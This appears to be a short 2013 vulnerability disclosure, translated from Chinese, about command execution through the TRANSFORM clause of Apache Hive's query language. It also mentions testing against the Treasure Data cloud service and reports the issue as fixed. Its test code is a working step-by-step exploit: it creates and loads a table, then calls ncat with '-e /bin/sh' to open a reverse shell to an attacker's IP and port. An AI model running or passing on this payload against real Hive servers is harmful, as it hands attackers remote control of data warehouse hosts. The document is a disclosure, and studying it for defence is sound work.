Date: 2013-02-9
Hive is the basic architecture of data warehouse built on Hadoop. It provides a series of tools for data extraction, conversion, and loading (ETL). This is a mechanism for storing, querying, and analyzing large-scale data stored in Hadoop. Hive defines a simple SQL-like query language called QL, which allows users familiar with SQL to query data. At the same time, this language also allows developers familiar with MapReduce to develop custom mapper and reducer to handle complicated analysis tasks that cannot be completed by built-in mapper and reducer.
Vulnerability details:
HQL can use transform to customize the Map/Reduce script used by Hive, so as to call shell/python and other languages. As a result, attackers can directly obtain server permissions through hive interfaces and other related operations.
Test code:
Create a new/root/test file with the content of 1 (or any int-type number)
Create test table
Create table if not exists kindle (id int );
Import data (this step is critical and no data can trigger the vulnerability)
Load data local inpath'/root/test' into table kindle;
Use transform to customize the shell commands used by hive, and reverse the shell
Select transform (id) USING '/usr/bin/ncat-e/bin/sh ip port' from kindle;
Delete test table
Drop table kindle;
-------------- Evil split line ------------
Case studies:
Test the Treasure Data cluster (Hadoop-based Big Data as a Service on the Cloud | Treasure Data)
Process:
Repair status:
The Treasure Data official website has been notified, and www.2cto.com has been fixed, as shown in the Official Reply